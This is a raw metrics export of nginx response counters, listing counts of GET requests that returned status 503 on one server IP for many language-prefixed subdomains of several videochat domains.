nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="jp.videochat.cafe"} 1353 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="jp.videochat.date"} 923 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="jp.videochat.mx"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="jp.videochat.show"} 349 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="jp.videochat.tv.br"} 3791 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="jp.videochat.world"} 951 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="jv.videochat.cafe"} 643 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="jv.videochat.date"} 194 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="jv.videochat.mx"} 8604 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="jv.videochat.show"} 599 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="jv.videochat.tv.br"} 3040 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="jv.videochat.world"} 267 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ka.videochat.cafe"} 1592 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ka.videochat.date"} 493 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ka.videochat.mx"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ka.videochat.show"} 374 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ka.videochat.tv.br"} 3727 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ka.videochat.world"} 687 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="kk.videochat.cafe"} 4699 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="kk.videochat.date"} 1008 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="kk.videochat.mx"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="kk.videochat.show"} 525 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="kk.videochat.tv.br"} 4140 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="kk.videochat.world"} 2657 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="km.videochat.cafe"} 1542 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="km.videochat.date"} 465 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="km.videochat.mx"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="km.videochat.show"} 434 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="km.videochat.tv.br"} 3485 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="km.videochat.world"} 1168 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="kn.videochat.cafe"} 1778 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="kn.videochat.date"} 458 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="kn.videochat.mx"} 47 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="kn.videochat.show"} 309 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="kn.videochat.tv.br"} 3686 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="kn.videochat.world"} 1179 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ko.videochat.cafe"} 1328 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ko.videochat.date"} 749 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ko.videochat.mx"} 27 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ko.videochat.show"} 333 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ko.videochat.tv.br"} 3603 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ko.videochat.world"} 1127 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ky.videochat.cafe"} 4064 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ky.videochat.date"} 764 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ky.videochat.mx"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ky.videochat.show"} 744 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ky.videochat.tv.br"} 3696 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ky.videochat.world"} 2061 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lb.videochat.cafe"} 862 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lb.videochat.date"} 338 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lb.videochat.mx"} 5058 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lb.videochat.show"} 337 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lb.videochat.tv.br"} 3477 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lb.videochat.world"} 703 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lo.videochat.cafe"} 1293 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lo.videochat.date"} 454 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lo.videochat.mx"} 27 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lo.videochat.show"} 952 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lo.videochat.tv.br"} 3957 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lo.videochat.world"} 999 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lt.videochat.cafe"} 1623 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lt.videochat.date"} 787 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lt.videochat.mx"} 2974 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lt.videochat.show"} 350 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lt.videochat.tv.br"} 2862 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lt.videochat.world"} 604 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lv.videochat.cafe"} 2060 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lv.videochat.date"} 829 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lv.videochat.mx"} 2085 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lv.videochat.show"} 466 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lv.videochat.tv.br"} 3251 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lv.videochat.world"} 817 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mail.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mg.videochat.cafe"} 777 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mg.videochat.date"} 158 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mg.videochat.mx"} 7075 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mg.videochat.show"} 145 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mg.videochat.tv.br"} 2806 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mg.videochat.world"} 617 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mi.videochat.cafe"} 2224 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mi.videochat.date"} 429 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mi.videochat.mx"} 2859 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mi.videochat.show"} 352 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mi.videochat.tv.br"} 3447 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mi.videochat.world"} 537 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mk.videochat.cafe"} 2832 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mk.videochat.date"} 1078 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mk.videochat.mx"} 49 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mk.videochat.show"} 460 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mk.videochat.tv.br"} 3730 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mk.videochat.world"} 2225 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ml.videochat.cafe"} 1440 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ml.videochat.date"} 369 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ml.videochat.mx"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ml.videochat.show"} 380 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ml.videochat.tv.br"} 3552 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ml.videochat.world"} 940 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mn.videochat.cafe"} 2872 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mn.videochat.date"} 855 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mn.videochat.mx"} 63 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mn.videochat.show"} 651 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mn.videochat.tv.br"} 3548 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mn.videochat.world"} 1571 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mr.videochat.cafe"} 1448 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mr.videochat.date"} 518 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mr.videochat.mx"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mr.videochat.show"} 1330 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mr.videochat.tv.br"} 3911 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mr.videochat.world"} 1160 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mrj.videochat.cafe"} 3200 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mrj.videochat.date"} 957 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mrj.videochat.mx"} 35 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mrj.videochat.show"} 1550 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mrj.videochat.tv.br"} 4255 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mrj.videochat.world"} 1885 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ms.videochat.cafe"} 978 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ms.videochat.date"} 158 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ms.videochat.mx"} 8028 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ms.videochat.show"} 174 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ms.videochat.tv.br"} 2799 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ms.videochat.world"} 730 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mt.videochat.cafe"} 1202 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mt.videochat.date"} 670 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mt.videochat.mx"} 4319 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mt.videochat.show"} 362 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mt.videochat.tv.br"} 4110 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mt.videochat.world"} 903 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="my.videochat.cafe"} 1230 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="my.videochat.date"} 574 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="my.videochat.mx"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="my.videochat.show"} 443 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="my.videochat.tv.br"} 3751 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="my.videochat.world"} 1197 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ne.videochat.cafe"} 1362 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ne.videochat.date"} 603 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ne.videochat.mx"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ne.videochat.show"} 853 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ne.videochat.tv.br"} 3705 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ne.videochat.world"} 1102 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="nl.videochat.cafe"} 606 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="nl.videochat.date"} 181 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="nl.videochat.mx"} 6713 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="nl.videochat.show"} 142 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="nl.videochat.tv.br"} 2835 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="nl.videochat.world"} 664 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="no.videochat.cafe"} 1274 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="no.videochat.date"} 565 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="no.videochat.mx"} 5963 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="no.videochat.show"} 713 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="no.videochat.tv.br"} 3499 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="no.videochat.world"} 726 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="pa.videochat.cafe"} 1318 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="pa.videochat.date"} 688 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="pa.videochat.mx"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="pa.videochat.show"} 424 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="pa.videochat.tv.br"} 3754 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="pa.videochat.world"} 797 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="pap.videochat.cafe"} 978 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="pap.videochat.date"} 370 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="pap.videochat.mx"} 2247 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="pap.videochat.show"} 215 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="pap.videochat.tv.br"} 2963 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="pap.videochat.world"} 422 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="pl.videochat.cafe"} 1036 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="pl.videochat.date"} 708 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="pl.videochat.mx"} 3998 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="pl.videochat.show"} 281 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="pl.videochat.tv.br"} 3177 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="pl.videochat.world"} 523 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="pt.videochat.cafe"} 1114 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="pt.videochat.date"} 528 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="pt.videochat.mx"} 6407 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="pt.videochat.show"} 294 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="pt.videochat.world"} 714 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ro.videochat.cafe"} 1119 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ro.videochat.date"} 750 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ro.videochat.mx"} 4727 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ro.videochat.show"} 453 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ro.videochat.tv.br"} 3553 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ro.videochat.world"} 533 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sco.videochat.cafe"} 1308 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sco.videochat.date"} 506 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sco.videochat.mx"} 2626 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sco.videochat.show"} 248 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sco.videochat.tv.br"} 3626 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sco.videochat.world"} 543 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="si.videochat.cafe"} 1588 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="si.videochat.date"} 639 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="si.videochat.mx"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="si.videochat.show"} 995 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="si.videochat.tv.br"} 3811 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="si.videochat.world"} 853 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sitemap.xml"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sk.videochat.cafe"} 1325 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sk.videochat.date"} 759 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sk.videochat.mx"} 3457 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sk.videochat.show"} 348 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sk.videochat.tv.br"} 3260 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sk.videochat.world"} 809 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sl.videochat.cafe"} 1281 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sl.videochat.date"} 395 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sl.videochat.mx"} 5540 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sl.videochat.show"} 429 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sl.videochat.tv.br"} 4036 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sl.videochat.world"} 534 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sr.videochat.cafe"} 2565 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sr.videochat.date"} 1306 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sr.videochat.mx"} 164 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sr.videochat.show"} 716 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sr.videochat.tv.br"} 3300 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sr.videochat.world"} 1316 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ssh-2.0"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="staging.videochat.mx"} 237 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="su.videochat.cafe"} 719 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="su.videochat.date"} 240 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="su.videochat.mx"} 7825 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="su.videochat.show"} 185 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="su.videochat.tv.br"} 3287 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="su.videochat.world"} 366 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sv.videochat.cafe"} 1321 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sv.videochat.date"} 604 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sv.videochat.mx"} 4550 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sv.videochat.show"} 345 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sv.videochat.tv.br"} 3607 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sv.videochat.world"} 459 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sw.videochat.cafe"} 898 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sw.videochat.date"} 230 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sw.videochat.mx"} 8523 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sw.videochat.show"} 163 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sw.videochat.tv.br"} 2552 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sw.videochat.world"} 321 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ta.videochat.cafe"} 1440 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ta.videochat.date"} 695 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ta.videochat.mx"} 29 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ta.videochat.show"} 500 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ta.videochat.tv.br"} 3983 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ta.videochat.world"} 871 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="te.videochat.cafe"} 1355 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="te.videochat.date"} 638 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="te.videochat.mx"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="te.videochat.show"} 454 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="te.videochat.tv.br"} 3865 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="te.videochat.world"} 1207 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="test.videochat.mx"} 258 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tg.videochat.cafe"} 3212 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tg.videochat.date"} 793 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tg.videochat.mx"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tg.videochat.show"} 385 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tg.videochat.tv.br"} 3232 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tg.videochat.world"} 1844 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="th.videochat.cafe"} 1301 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="th.videochat.date"} 636 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="th.videochat.mx"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="th.videochat.show"} 412 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="th.videochat.tv.br"} 3480 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="th.videochat.world"} 1005 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tl.videochat.cafe"} 5833 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tl.videochat.date"} 2382 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tl.videochat.mx"} 8061 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tl.videochat.show"} 140 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tl.videochat.tv.br"} 2668 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tl.videochat.world"} 6228 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tr.videochat.cafe"} 1818 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tr.videochat.date"} 828 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tr.videochat.mx"} 1979 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tr.videochat.show"} 353 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tr.videochat.tv.br"} 3601 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tr.videochat.world"} 779 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tt.videochat.cafe"} 2426 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tt.videochat.date"} 1084 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tt.videochat.mx"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tt.videochat.show"} 1055 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tt.videochat.tv.br"} 4258 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tt.videochat.world"} 1075 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="udm.videochat.cafe"} 3308 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="udm.videochat.date"} 1134 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="udm.videochat.mx"} 35 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="udm.videochat.show"} 1231 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="udm.videochat.tv.br"} 3079 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="udm.videochat.world"} 1656 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="uk.videochat.cafe"} 4182 